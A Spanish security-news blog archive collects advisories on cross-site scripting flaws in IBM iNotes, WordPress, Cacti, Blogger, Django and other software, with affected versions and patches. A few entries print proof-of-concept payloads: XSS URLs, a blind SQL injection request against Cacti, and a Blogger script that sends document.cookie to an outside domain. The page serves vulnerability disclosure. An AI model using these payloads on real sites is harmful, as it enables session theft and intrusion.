Mostrando entradas con la etiqueta Cross-site scripting. Mostrar todas las entradas
Mostrando entradas con la etiqueta Cross-site scripting. Mostrar todas las entradas

sábado, 21 de enero de 2017

Vulnerabilidad de Cross-Site Scripting en IBM iNotes

IBM ha confirmado una vulnerabilidad en IBM iNotes que podría permitir a atacantes remotos la realización de ataques de cross-site scripting.

IBM iNotes (anteriormente conocido como IBM Lotus iNotes) es una versión completa basada en web del cliente de Notes, incluyendo todas sus funciones. iNotes proporciona acceso desde el navegador al correo electrónico, el calendario y los contactos de Notes, así como el acceso a las aplicaciones y herramientas empresariales.

El problema corregido (con CVE-2016-5881) reside en una validación inadecuada de las entradas del usuario. Un atacante remoto podría explotar la vulnerabilidad mediante URLs específicamente creadas, lo que le permitiría ejecutar scripts en el navegador de la víctima. Se podría utilizar esta vulnerabilidad para robar las cookies de las credenciales de autenticación de la víctima y los datos presentados recientemente.

Se ven afectadas las versions IBM iNotes 9.0 y 9.0.1 anterior a 9.0.1 Fix Pack 7 e IBM iNotes 8.5, 8.5.1, 8.5.2 y 8.5.3 anterior a 8.5.3 Fix Pack 6 Interim Fix 15

IBM ha publicado las actualizaciones necesarias en Domino e iNotes versiones 9.0.1 Fix Pack 7 y 8.5.3 Fix Pack 6 Interim Fix 15. Disponible desde:
Notes/Domino 9.0.1 Fix Packs
Interim Fixes para 8.5.3 Fix Pack 6 IBM Notes, IBM Domino e IBM iNotes
Notes/Domino 8.5.3 Fix Packs

Más información:

Security Bulletin: Fix Available for IBM iNotes Cross-site Scripting Vulnerability (CVE-2016-5881)




Antonio Ropero
Twitter: @aropero



domingo, 4 de diciembre de 2016

Múltiples vulnerabilidades en IBM iNotes y Domino

IBM ha publicado actualizaciones destinadas a solucionar ocho vulnerabilidades de cross-site scripting y una de denegación de servicio en IBM Domino y en IBM iNotes versiones 8.5 y 9.0.

Se trata de ocho vulnerabilidades de cross-site scripting en IBM iNotes, que se incluye como parte de IBM Domino. Como es habitual en estos casos el problema reside en una validación insuficiente de las entradas suministradas por el usuario. Un atacante remoto podría ejecutar código arbitrario HTML o script en el navegador del usuario en el contexto del sitio afectado. Esto podría permitir que el atacante accediera a información sensible basada en el navegador como cookies de autenticación y los datos presentados recientemente.

También se soluciona una vulnerabilidad de denegación de servicio relacionada con un problema en Apache Tomcat. El fallo reside en el componente Apache Commons FileUpload, un atacante podrá provocar que el servidor deje de responder mediante el envió de peticiones de subida de archivos.


Se ven afectadas las versiones
IBM Domino 9.0.1 a 9.0.1 Fix Pack 7
IBM Domino 9.0.0x
IBM Domino 8.5.3 a 8.5.3 Fix Pack 6 Interim Fix 14
IBM Domino 8.5.2x
IBM Domino 8.5.1x

IBM ha publicado las siguientes actualizaciones:
Domino 9.0.1 Fix Pack 7 Interim Fix 1
Domino 8.5.3 Fix Pack 6 Interim Fix 15

Más información:

Security Bulletin: Multiple Vulnerabilities affect IBM Domino & IBM iNotes






Antonio Ropero
Twitter: @aropero

domingo, 6 de diciembre de 2015

Diversas vulnerabilidades en IBM WebSphere Portal

Se han anunciado cuatro vulnerabilidades en IBM WebSphere Portal que podrían permitir a un atacante remoto construir ataques de cross-site scripting o de denegación de servicio en los sistemas afectados.

IBM WebSphere Portal ofrece una aplicación compuesta o infraestructura de "mashup" empresarial y las herramientas para crear soluciones basadas en SOA (Arquitectura Orientada a Servicios). WebSphere Portal contiene una amplia variedad de tecnologías destinadas a desarrollar y mantener portales B2C, B2B y B2E.

Tres de las vulnerabilidades, con CVE-2015-4993, CVE-2015-4998 y CVE-2015-7413, residen en un error de validación de entradas. De forma que podrían permitir a un atacante remoto crear URLs, que al ser cargadas por el usuario permitan la ejecución de código script arbitrario. El código se origina desde el sitio que ejecuta WebSphere por lo que se ejecutará en el contexto de seguridad de dicho sitio. Con ello el atacante podría acceder a las cookies (incluyendo las de autenticación) y a información recientemente enviada, además de poder realizar acciones en el sitio haciéndose pasar por la víctima.

Por otra parte, con CVE-2015-5001, también por una insuficiente validación de entradas se confirma una vulnerabilidad de denegación de servicio. Mediante el envío de un documento específicamente creado un atacante podría conseguir el consumo de todos los recursos de memoria.

Se ven afectadas las versiones de WebSphere Portal 8.5, 8.0, 7 y 6. IBM ha publicado diferentes correcciones para evitar estos problemas. Dada la diversidad de versiones afectadas y parches se recomienda consultar el aviso

Más información:

Security Bulletin: Fix Available for Security Vulnerabilities in IBM WebSphere Portal (CVE-2015-4993, CVE-2015-4998, CVE-2015-5001, CVE-2015-7413)




Antonio Ropero

Twitter: @aropero

jueves, 3 de diciembre de 2015

Cross-site scripting en OTRS

OTRS ha publicado actualizaciones para evitar una vulnerabilidad de cross-site scripting en todas las versiones del módulo FAQ.

OTRS es un proyecto de código abierto destinado a la gestión de tickets. Los tickets pueden llegar bien a través de teléfono o de correo electrónico, y son gestionados desde una interfaz web. Una de las grandes ventajas de esta plataforma, es que permite ser personalizada por medio de diferentes módulos.

El problema podría permitir a usuarios locales crear URLs en la búsqueda en FAQ, que podría facilitar la creación de ataques de cross-site scripting. Como siempre, esta vulnerabilidad podría permitir el acceso a las cookies (incluyendo las de autenticación) y a información recientemente enviada, además de poder realizar acciones en el sitio haciéndose pasar por la víctima.

Se ven afectadas todas las versiones del módulo FAQ (2.x.x, 4.0.x y 5.0.x). Se han publicado las versiones FAQ 5.0.2, FAQ 4.0.3 y FAQ 2.3.4 que solucionan este problema. Disponibles desde:

Más información:

Security Advisory 2015-03: Vulnerability discovered in OTRS FAQ package


Antonio Ropero
Twitter: @aropero





lunes, 5 de octubre de 2015

Vulnerabilidad descubierta en Dotclear

Se ha reportado una vulnerabilidad en Dotclear que podría permitir a un atacante remoto realizar ataques de Cross Site Scripting (XSS).

Dotclear es un software de publicación web de código abierto, es una herramienta fácil de usar que permite publicar en la web independientemente de las capacidades técnicas del usuario. Es un software libre diseñado principalmente para los usuarios, permitiéndoles contribuir a mejorarlo. Todo el mundo puede usarlo y modificarlo de acuerdo a la licencia de software.

Como hemos comentado en otras ocasiones, un ataque Cross-site Scripting (o XSS) se basa en que una página web no filtra correctamente ciertos caracteres especiales y permite ejecutar código script arbitrario.

La vulnerabilidad, anunciada por Yuji Tounai perteneciente a NTT Com Security(Japan)KK , tiene asignado el identificador CVE-2015-5651.
Esta vulnerabilidad permitiría a un atacante remoto no autenticado ejecutar código arbitrario en el navegador de un usuario que visite una página web maliciosa, bajo el contexto de la web atacada.

Esta vulnerabilidad se han reportado en la versión 2.8.0 aunque también podría afectar a versiones anteriores. Se recomienda actualizar a versión 2.8.1

Más información:

Dotclear vulnerable to cross-site scripting

Dotclear 2.8.1

Una-al-día (20/10/2013). No te dejes engañar por las vulnerabilidades leves (I)



Juan Sánchez


sábado, 25 de julio de 2015

Actualización de seguridad para Wordpress

Se ha publicado la versión 4.2.3 de WordPress que soluciona dos vulnerabilidades, una de las cuales podría permitir a determinados usuarios comprometer el sitio web.

Wordpress es un sistema de gestión de contenidos enfocado a la creación de blogs desarrollado en PHP y MySQL, ampliamente usado en la comunidad de bloggers debido a su facilidad de uso y sus características como gestor de contenidos.

El primero de los problemas, con CVE-2015-5622, se refiere a una vulnerabilidad de cross-site scripting que podría permitir a usuarios con permisos de "Contributor" o "Author" comprometer el sitio. También se ha solucionado otro problema, con CVE-2015-5622, que podría pemitir a usuarios con permisos de "Subscriber" crear un borrados a través de "Quick Draft".

Igualmente WordPress 4.2.3 contiene la corrección de otros 20 bugs desde la versión 4.2.

Dada la importancia de los problemas corregidos se recomienda la actualización de los sistemas a la versión 4.2.3 disponible desde:
O bien desde el dashboard, Actualizaciones (Updates), Actualizar Ahora (Update Now). Los sitios que soporten actualizaciones automáticas ya han iniciado la actualización a WordPress 4.2.3.

Más información:

WordPress 4.2.3 Security and Maintenance Release



Antonio Ropero

Twitter: @aropero

domingo, 14 de junio de 2015

Cross-Site Scripting en Adobe Connect

Adobe ha publicado Adobe Connect 9.4 que soluciona dos vulnerabilidades de cross-site scripting.

Adobe Connect es una solución de conferencias web para reuniones, aprendizaje electrónico y seminarios Web. Hace posible el uso de soluciones de conferencias en múltiples dispositivos a través de tecnología web.

Adobe Connect 9.4 incluye correcciones de múltiples errores (no relacionados directamente con problemas de seguridad) y grupos de usuarios nuevos en diferentes áreas del producto.


Se ha proporcionado una prueba de concepto para CVE-2015-0343:
https://[objetivo]/admin/home/homepage/search?account-id=1&filter-rows=1&filter-start=0&now=yes&query=<a href="javascript:alert('XSS')">XSS </a>

Más información:

Adobe Connect Help /Adobe Connect 9.4 Release Notes

XSS vulnerability Adobe Connect 9.3 (CVE-2015-0343 )

Adobe Connect


Antonio Ropero

Twitter: @aropero

miércoles, 17 de diciembre de 2014

Cross-Site Scripting en Cisco ASA

Cisco ha anunciado la existencia de una vulnerabilidad en el software Cisco de losAdaptive Security Appliances (ASA) configurados para WebVPN, que podría permitir a un atacante realizar ataques de cross-site scripting.

El problema reside en la validación inadecuada de las entradas en la página de autenticación del portal WebVPN de Cisco ASA que podría permitir la ejecución de código script arbitrario (cross-site scripting). Con ello el atacante podría acceder a las cookies (incluyendo las de autenticación) y a información recientemente enviada, además de poder realizar acciones en el sitio haciéndose pasar por la víctima.

La vulnerabilidad tiene asignado el CVE-2014-8012. Cisco no ofrece actualizaciones gratuitas para este problema. Para obtener versiones actualizadas se debe contactar con el canal de soporte.

Más información:

Cisco Adaptive Security Appliance DOM Cross-Site Scripting Vulnerability in WebVPN Portal


Antonio Ropero
Twitter: @aropero

jueves, 26 de junio de 2014

Cross-Site Scripting en la consola de configuración de Sophos AntiVirus

Se ha anunciado una vulnerabilidad en la Consola de Configuración (versión Linux) de Sophos Antivirus que podría permitir a un atacante remoto construir ataques de cross-site scripting. 

El problema reside en que varios scripts de la versión Linux de la Consola de Configuración (Configuration Console) de Sophos Antivirus 9.5.1 no filtran adecuadamente algunos parámetros antes de devolverlos de nuevo al navegador, lo que podría dar lugar a ataques cross-site scripting. No se ha confirmado que otras plataformas puedan verse afectadas.

Se han detectado como afectados las siguientes URLs y parámetros:
http://localhost:8081/exclusion/configure
newListList:ExcludeFileOnExpression
newListList:ExcludeFilesystems
newListList:ExcludeMountPaths
 
http://localhost:8081/notification/configure
text:EmailServer
newListList:Email

Este problema permite a usuarios remotos la ejecución de código script en el navegador del usuario. Con ello el atacante podría acceder a las cookies (incluyendo las de autenticación) y a información recientemente enviada, además de poder realizar acciones en el sitio haciéndose pasar por la víctima.

Sophos ha publicado versión 9.6.1 que corrige la vulnerabilidad.

Más información:

Vulnerability title: Multiple Cross Site Scripting in Sophos Antivirus Configuration Console (Linux)



Antonio Ropero
Twitter: @aropero


miércoles, 11 de junio de 2014

De malos y delincuentes

Hoy ha sido un día movido para dos servicios importantes de Internet, por una parte todos los servicios de TweetDeck se han visto afectados por un ataque de cross-site scripting que ha empezado a producir retweets de forma automática. Por otra parte Feedly, la alternativa al difunto Reader de Google, sufre un ataque de denegación de servicio distribuido (DDoS), por el que además ha anunciado recibir una extorsión para poder recuperar el servicio.

TweetDeck es una aplicación para la gestión y tratamiento de cuentas de Twitter. Puede emplearse como aplicación de escritorio, aplicación web o aplicación para Chrome. En la actualidad está soportada por la propia Twitter tras su adquisición en 2011. La interfaz de TweetDeck permite gestionar múltiples cuentas y visualizar de forma simultánea en múltiples columnas los tweets, menciones, mensajes directos, listas, búsquedas, etc.

Al recibir el tweet malicioso se visualizaba un mensaje de aviso
Esta misma tarde se ha visto afectada por un ataque de cross-site scripting en forma de un Tweet que al ser recibido por un usuario de TweetDeck, en cualquiera de los entornos, se producía un retweet de forma automática. Esto ha producido una cadena de Tweets y retweets que ha obligado a Twitter a detener todos los servicios de la aplicación.

A pesar de la gravedad que ha tenido el ataque, este podía haber sido mucho más grave y hubiese afectado incluso a los propios cimientos de Twitter si los retweets se hubieran realizado de forma más virulenta, provocando múltiples cadenas y réplicas.

Aspecto del tweet que aprovechaba el cross-site scripting

Más grave y preocupante parece el ataque que desde esta mañana sufre Feedly.

Feedly es uno de los lectores y organizadores de rss más populares. Permite la lectura de forma sencilla y cómoda de los blogs a los que esté suscrito el usuario, desde un navegador web o desde cualquiera de las aplicaciones nativas para IOS o Android.

"Criminales están atacando feedly con un ataque de denegación de servicio distribuido (DDoS). Nos negamos a ceder y estamos trabajando con nuestros proveedores de red para mitigar el ataque de la mejor manera posible" ("Criminals are attacking feedly with a distributed denial of service attack (DDoS). The attacker is trying to extort us money to make it stop. We refused to give in and are working with our network providers to mitigate the attack as best as we can.")

Esta tarde han informado que están realizando cambios en su infraestructura para poder volver a estar online, sin embargo aun parece que necesitarán algunas horas más. También recuerdan que ningún dato en línea de los usuarios ha sido comprometido.

De forma similar ayer mismo Evernote, la popular aplicación de notas, también sufrió un ataque de denegación de servicio, del que se recuperó rápidamente. Y otros servicios de Internet parece que están sufriendo ataques de este tipo. 

Más información:

Denial of service attack

Tweetdeck

Antonio Ropero
Twitter: @aropero

lunes, 9 de junio de 2014

Cross-site scripting en MediaWiki

Se han publicado nuevas versiones de MediaWiki para las ramas 1.22, 1.21 y 1.19 que corrigen una vulnerabilidad que podría permitir a un atacante realizar ataques cross-site scripting.

MediaWiki es un software de código abierto de creación de sitios de edición colaborativa de páginas web, comúnmente conocidos como wikis. Entre este tipo de software, MediaWiki es popular por ser el utilizado para alojar y editar los artículos de Wikipedia.

El problema, con CVE-2014-3966, reside en que 'Special:PasswordReset' no filtra adecuadamente las entradas del parámetro 'username' antes de mostrar la entrada. Esto podría dar lugar a ataques cross-site scripting. Esto permite a usuarios remotos la ejecución de código script en el navegador del usuario. Con ello el atacante podría acceder a las cookies (incluyendo las de autenticación) y a información recientemente enviada, además de poder realizar acciones en el sitio haciéndose pasar por la víctima.

Se encuentran disponibles en el sitio oficial de MediaWiki las nuevas versiones 1.19.16, 1.21.10 y 1.22.7 que solucionan este problema.

Más información:

[MediaWiki-announce] MediaWiki Security and Maintenance Releases: 1.19.16, 1.21.10 and 1.22.7





Antonio Ropero
Twitter: @aropero

sábado, 31 de agosto de 2013

Múltiples vulnerabilidades en Cacti

Se han corregido múltiples fallos de seguridad en la última versión de Cacti (0.8.8b). Los errores se corresponden con una falta de filtrado adecuado en los parámetros de entrada que podrían permitir a un atacante inyectar código Javascript y SQL.

Cacti es un software especialmente diseñado para crear gráficas de monitorización mediante los datos obtenidos por diferentes herramientas que emplean el estándar RRDtool. Es uno de los sistemas de creación de gráficas más empleado en el mundo de la administración de sistemas y puede encontrarse como parte fundamental de otros programas.

Los errores se detallan a continuación:

  • CVE-2013-5588 - Cross-site-scripting no persistente

El parámetro "step" de la página "/install/index.php" sería vulnerable a XSS reflejado.
Ejemplo:
http://<IP>/cacti/install/index.php?x=52&y=21&step="><script>alert(12345)</script>

  • CVE-2013-5588 - Cross-site-scripting persistente

En este caso el parámetro "id" de la página "/cacti/host.php" sería vulnerable a XSS persistente. La siguiente petición POST sirve como prueba de concepto:

POST /cacti/host.php HTTP/1.1
Host: <IP>
Cookie: Cacti=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

id=<script>alert(12345)</script>&save_component_host=1&action=save

Una vez hecha la petición anterior, accedemos a
http://<IP>/cacti/utilities.php?tail_lines=500&message_type=-1&go=Go&refresh=60&reverse=1&filter=12345&page=1&action=view_logfile
y podremos ver la ventana emergente que demuestra el XSS.

  • CVE-2013-5589 - Blind SQL injection

El parámetro "id" de la página "/install/index.php" además sería vulnerable a una inyección sql ciega , esto se debe a que no se filtra correctamente este parámetro cuando se le pasa a la función api_device_save() del script lib/api_device.php. Sirva como POC la siguiente petición:

POST /cacti/host.php HTTP/1.1
Host: <IP>
Cookie: Cacti=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

id=-1 AND BENCHMARK(1000000,MD5(1))&save_component_host=1&action=save

Se han publicado parches que solucionan dichos errores y que se encuentran disponibles a través del repositorio svn de cacti, concretamente las revisiones r7420 y r7421.

Más información:

Multiple vulnerabilities in Cacti 0.8.8b and lower

Bug #0002383 : Sanitize the step and id variables

Bug #0002383 : Sanitize the step and id variables same as R#7420 for 089



Fernando Castillo

domingo, 18 de agosto de 2013

Nuevas versiones de Django solucionan vulnerabilidades de cross-site scripting

La Django Software Foundation ha publicado nuevas versiones de las ramas 1.4, 1.5 y 1.6 beta de Django, que solucionan dos vulnerabilidades que permitirían ataques de tipo cross-site scripting.

Django es un entorno de desarrollo de código abierto basado en Python para el desarrollo de sitios web siguiendo el patrón Modelo Vista Controlador. Fue publicado por primera vez en 2005, siendo su última versión estable la 1.5 y encontrándose la 1.6 en fase de desarrollo.

La primera de las vulnerabilidades se encuentra en la interfaz de administración. Desde esta aplicación se permite a los usuarios, previa autenticación, la edición de datos de las aplicaciones y sitios web en desarrollo.

Django aplica por defecto un escape de la salida sobre ciertos campos de aplicación potencialmente inseguros. Sin embargo, los campos de tipo URLField que son usados para almacenar URLs, son tratados como seguros al mostrarlos en esta interfaz. Esto los hace vectores potenciales para realizar ataques cross-site scripting.

El problema aparece principalmente en el sitio de administración, pero puede extenderse a cualquier parte del sitio que haga uso de los widgets que este provee. Para solucionarlo, se ha cambiado el trato por defecto a los campos URLField, pasando a tratarse como contenido inseguro, y aplicando sobre ellos el filtrado. Esta vulnerabilidad ha sido descubierta por Łukasz Langa, y afecta tanto a la rama 1.5 como 1.6.

La segunda vulnerabilidad se encuentra en el sistema 'POST-redirect-GET'. Este sistema permite pasar como parámetro la URL a la que el usuario va a ser redirigido si el proceso de la vista tiene éxito (por ejemplo, al abrir o cerrar sesión).

Este parámetro es validado mediante la función 'django.utils.http.is_safe_url', que comprueba que esté en el mismo dominio y que no sea una cadena maliciosa. Este proceso fue introducido el año pasado a raíz de la vulnerabilidad CVE-2012-3442, de la que informamos en su momento.

Aunque 'django.utils.http.is_safe_url' está diseñada para permitir redirecciones solo a esquemas HTTP y HTTPS, se ha descubierto un problema en la forma en la que la función procesa este parámetro, que podría permitir la redirección a otros esquemas, (por ejemplo, mailto: o javascript:).

El fallo podría permitir potencialmente un ataque cross-site scripting, aunque no se ha descubierto de momento un método de explotación. Afecta a las ramas 1.4, 1.5 y 1.6 beta y ha sido descubierta por Nick Bruun.

Se recomienda a los usuarios que actualicen a las versiones 1.4.6, 1.5.2 y 1.6 beta 2. Las actualizaciones están disponibles a través del repositorio PyPi o la página oficial de Django.

Más información:

Security releases issued

Denegaciones de servicio y cross-site scripting en Django


Francisco López

miércoles, 29 de mayo de 2013

Paypal no paga por un fallo de seguridad descubierto por un chico de 17 años

Robert Kugler, un alemán de 17 años, ha descubierto un grave fallo de seguridad en Paypal. La empresa, lejos de recompensar al estudiante a través de su programa oficial de caza de bugs, le "descalificó" después de haber reportado el fallo, que finalmente ha hecho público. No es el primer desliz de Paypal con respecto a los investigadores.

Robert Kugler ha descubierto un clásico problema de Cross Site Scripting en el buscador de Paypal. En una web de esta categoría, un XSS puede resultar extremadamente serio, puesto que permitiría a atacantes engañar a los usuarios de una manera mucho más sofisticada.
Kugler quiso acogerse al programa de recompensas de Paypal, que anima a la investigación responsable de vulnerabilidades premiando económicamente a los usuarios que encuentren fallos de seguridad. Así motivan un uso responsable de las vulnerabilidades. Mozilla, Google y otros agentes externos que funcionan como intermediarios, actúan de esta forma con éxito desde que se pusiera de moda hace unos años.

Kluger recibió sin embargo un email afirmando que su descubrimiento no optaba al premio por tener 17 años. Finalmente ha publicado el problema en Full Disclosure, quejándose de la situación. Kluger afirma que la respuesta de Paypal fue:

"To be eligible for the Bug Bounty Program, you must not: ... Be less than 18 years of age. If PayPal discovers that a researcher does not meet any of the criteria above, PayPal will remove that researcher from the Bug Bounty Program and disqualify them from receiving any bounty payments."

Pero parece que esto le fue comunicado en privado, puesto que públicamente no se pueden encontrar fácilmente esas restricciones en ninguna página oficial de Paypal ni parece que nunca se haya impuesto públicamente esta restricción.

El investigador en desventaja

Poner restricciones a la entregas de premios después de haber recibido la información es una práctica que, cuando menos, coloca al investigador en desventaja. No conoce las reglas del juego completas hasta que ha enseñado sus cartas (el código vulnerable) a la compañía. Esta, que ya puede arreglar el fallo (en última instancia, es lo que les interesa), decide entonces que los menores de edad no pueden recibir un premio.

Si se tratase de una cuestión legal, existen innumerables formas de sortear el inconveniente, como pedir permiso a sus tutores legales o compensar de otras formas. Pero la realidad es que se ha rechazado a la persona que encuentra un fallo que perfectamente encaja en la dinámica y reglas propuestas por Paypal, por una cuestión "menor" como es la edad... y esto deja en clara desventaja al usuario y da muy mala imagen a Paypal, que no es la primera vez que se ve criticada por otros aspirantes a la recompensa. Se han conocido otros problemas sufridos por investigadores para que la compañía realmente les pague por sus vulnerabilidades.

Otras empresas como Mozilla, llegaron a pagar 3.000 dólares a un chico de 12 años por encontrar un grave fallo de seguridad en el navegador. Cim Stordal, de 15 años, ha descubierto ya fallos en Facebook, Chrome... y en la mayoría de los programas ha sido aceptado y recompensado.

El investigador de seguridad informática es habitualmente joven, y la experiencia demuestra que suele elucubrar sus mejores ideas o potenciar sus habilidades durante su adolescencia. Imponer una restricción de edad como si la "inmadurez legal" fuese un obstáculo técnico en el mundo de la seguridad, no puede más que interpretarse como una excusa por parte de la compañía y una puesta en evidencia de un programa de recompensas que, si bien ha resultado una buena idea en general para todas las empresas que lo han puesto en marcha, Paypal en concreto parece gestionar de forma discutible. O al menos, no parece que le esté otorgando el rédito en buena imagen que, como efecto colateral, también se busca con estas iniciativas.

Más información:

La caza de bugs en Paypal acaba con la publicación de un grave agujero de seguridad

PayPal.com XSS Vulnerability

Boy bug hunter nabs $3,000 from Mozilla

Teen finds bugs in Google, Facebook, Apple, Microsoft code



Sergio de los Santos
Twitter: @ssantosv

miércoles, 23 de enero de 2013

Cross site Scripting persistente en Blogger


Se ha encontrado un problema de Cross-Site Scripting persistente en Blogger, que podría permitir a un atacante con permisos de escritura de blogs robar la cuenta de administrador. Google no considera el problema una vulnerabilidad en sí.

Blogger es un servicio de publicación de bitácoras en línea de Google. Lleva activo desde el año 2000 y se considera el precursor del uso de formularios web para la publicación de contenido.

Un ataque Cross-site Scripting o XSS se basa en que una página web no filtra correctamente ciertos caracteres especiales y permite ejecutar código JavaScript. Dentro del XSS existen dos tipos, el persistente y el no persistente.

Con el XSS no persistente se consigue que, mediante una URL especialmente modificada, en la web afectada se obtenga otro resultado. Hace 2 años se realizó un ataque XSS no persistente muy sonado en la página web de la "Presidencia Española de la EU", cambiando elvídeo de bienvenida del entonces presidente, por una foto de Mr. Bean (aunque podía haber sido cualquier otra).


Si se entraba a la página a través de la URL "normal", se veía la página en perfecto estado, pero el atacante en este caso publicitó una URL manipulada a través que las redes sociales que cargaba la imagen de Mr. Bean desde otro punto.

El otro tipo es el XSS persistente, que puede resultar bastante más peligroso. Este tipo de ataques se producen igualmente al no comprobar los datos de entrada en una web, normalmente formularios y quedan "grabados". El atacante puede introducir un código JavaScript que quedará almacenado en la base de datos y cuando un usuario legítimo visite la web, esta cargará ese código.

El fallo en Blogger consiste en un XSS persistente al publicar una noticia. Al almacenar la publicación en la base de datos, el sistema no filtra correctamente las etiquetas '<script>', utilizadas para ejecutar código JavaScript.

Así pues, si publicamos una entrada en formato HTML con el texto <script>alert('hola')</script>, el visitante al entrar verá algo así:



Pero también es posible robar información como las cookies, accediendo a los datos con JavaScript y enviándolos a una página externa en los que queadarán recogidos. Por ejemplo:

<script>document.location="http://dominioconXSS.com/script_manipulado.php?cookie="
+
document.cookie;document.location="http://www.dominiodelatacante.com"</script>

Y el 'script_manipulado.php' se encargaría de recoger la cookie. Con esta información un atacante podría por ejemplo acceder con la misma sesión suplantando a la víctima.

Google no considera en general la "autoinclusión" de JavaScript una vulnerabilidad, y así lo indica desde hace tiempo en su programa de recompensas:

"Execution of owner-supplied JavaScript on Blogger: Blogger users are permitted to place custom JavaScript in their own blog templates and blog posts; our take on this is that blogs are user-generated content, not different from any third-party website on the Internet. Naturally, for your safety, we do employ spam and malware detection technologies - but we believe that the flexibility in managing your own content is essential to the success of our blogging platform.
 Therefore, the ability to execute owner-supplied scripts on your own blog is not considered to be a vulnerability. That being said, the ability to inject arbitrary JavaScript onto somebody else’s blog would likely qualify for a reward!"

En realidad, Google defiende que el usuario debe poder ejecutar código JavaScript en sus entradas, para proporcionar más flexibilidad. Lógicamente, luchará contra el uso en técnicas de spam y malware a través de estos métodos, pero no puede restringir el uso de JavaScript a un usuario que puede incluir cualquier contenido en su web.

Aunque lo que afirma Google es cierto, el problema de esta vulnerabilidad vendría en el caso de que el blog sea usado por colaboradores externos y administradores. Los colaboradores o editores pueden introducir contenido (también JavaScript) en las entradas, pero no pueden administrar el sitio. Si el administrador visualiza esas entradas para moderarlas, los editores podrían obtener información y "elevar" privilegios.

Más información:

Full disclosure - XSS Persistent in Blogspot of Google

Google - Vulnerability Reward Program

una-al-dia (04/01/2010) El falso "hackeo" de la web de la presidencia española, XSS y lecciones para aprender


Antonio Sánchez

Sergio de los Santos
Twitter: @ssantosv

miércoles, 8 de agosto de 2012

Cross-Site Scripting en HP Network Node Manager i


Se ha anunciado una vulnerabilidad de cross-site scripting en HP Network Node Manager i (NNMi) versiones 8.x, 9.0x, 9.1x y 9.20 (para HP-UX, Linux, Solaris y Windows) que podría permitir a un atacante remoto construir ataques de tipo cross-site scripting.

HP Openview Network Node Manager (NNM) es la herramienta que dio origen a la familia productos HP Openview. Se trata de un conjunto de herramientas para la administración de redes. Posee funciones de monitorización de dispositivos, recolección, almacenamiento y tratamiento de información SNMP.

La vulnerabilidad con CVE-2012-2022, se debe a un filtrado inadecuado en peticiones http. Un atacante remoto podría aprovechar esta vulnerabilidad para crear una URL que cuando sea cargada por el usuario atacado, ejecute código script en su navegador (cross-site scripting).

Se recomienda aplicar la actualización disponible desde el boletín de seguridad de HP:

Más información:

HPSBMU02798 SSRT100908 rev.1 - HP Network Node Manager i (NNMi) for
HP-UX, Linux, Solaris, and Windows, Remote Cross Site Scripting (XSS)
  

Antonio Ropero
Twitter: @aropero




domingo, 8 de abril de 2012

Cross site scripting en vBulletin 4.1.x


El conocido software escrito en PHP para creación de foros en Internet es vulnerable a ataques de Cross Site Scripting (XSS).

El equipo de vBulletin ha publicado un informe anunciando tres vulnerabilidades Cross Site Scripting. Se deben a errores de filtrado en determinados parámetros de entrada, que no han sido especificados, en los archivos siguientes:

  • includes/version_vbulletin.php
  • clientscript/ckeplugins/bbcode/plugin.js
  • clientscript/ckeditor/ckeditor.js

Estas vulnerabilidades podrían ser explotadas por un atacante remoto para ejecutar código HTML o JavaScript arbitrario en el navegador de un usuario que visite una página web maliciosa, bajo el contexto de la web atacada.

Las versiones que se ven afectadas por estas vulnerabilidades son las comprendidas entre la 4.1.4 y la 4.1.11 tanto en la modalidad 'Forum' como 'Publishig Suite'. Según el equipo de vBulletin, las versiones 4.1.3 y anteriores no se ven afectadas, y tampoco la rama 3.x.

vBulletin ha publicado un parche que corrige estas vulnerabilidades. Se encuentra disponible para su descarga desde la página oficial.

Más información:

vBulletin Security Patch for vBulletin 4.1.4 - 4.1.11 for Suite & Forum

vBulletin patch download


Juan José Ruiz


jueves, 16 de febrero de 2012

Actualización de seguridad para Adobe Flash Player


Adobe ha publicado una actualización de seguridad (con identificación es APSB12-03) destinada a corregir siete vulnerabilidades críticas en Adobe Flash Player versión 11.1.102.55 (y anteriores) para Windows, Macintosh, Linux y Solaris; Adobe Flash Player 11.1.112.61 (y anteriores) para Android 4.x; y Adobe Flash Player 11.1.111.5 (y versiones anteriores) para Android 3.x y 2.x.

Las vulnerabilidades con identificadores CVE-2012-0751, CVE-2012-0752, CVE-2012-0753, CVE-2012-0754, CVE-2012-0755 y CVE-2012-0756, pueden permitir a un atacante provocar la caída del sistema e incluso llegar a tomar el control de los sistemas afectados. Estas vulnerabilidades están relacionadas con diversos problemas de corrupción de memoria, en el control ActiveX para Windows, en el tratamiento de MP4 y evasión de controles de seguridad.

Esta actualización también resuelve una vulnerabilidad de cross-site scripting, con CVE-2012-0767, que en la actualidad está siendo explotada de forma activa en ataques dirigidos, diseñados para engañar al usuario para acceder a un enlace malicioso a través de mensajes de correo (solo en Internet Explorer sobre Windows).

Adobe recomienda a los usuarios de Adobe Flash Player 11.1.102.55 (y anteriores) para Windows, Macintosh, Linux y Solaris la actualización a la versión 11.1.102.62 disponible en http://get.adobe.com/flashplayer/ o desde la opción de actualización automática.
Para los usuarios que no puedan actualizar a Flash Player 11.1.102.62, Adobe ha desarrollado una versión parcheada de Flash Player 10.x, (Flash Player 10.3.183.15), que puede descargarse desde http://kb2.adobe.com/cps/142/tn_14266.html.

A los usuarios de Adobe Flash Player 11.1.112.61 (y anteriores) para Android 4.x actualizar a la versión 11.1.115.6 y los usuarios de Adobe Flash Player 11.1.111.5 y versiones anteriores para Android 3.x deben actualizar a Flash Player 11.1.111.6, desde Android Market:

Más información:

Security update available for Adobe Flash Player



Antonio Ropero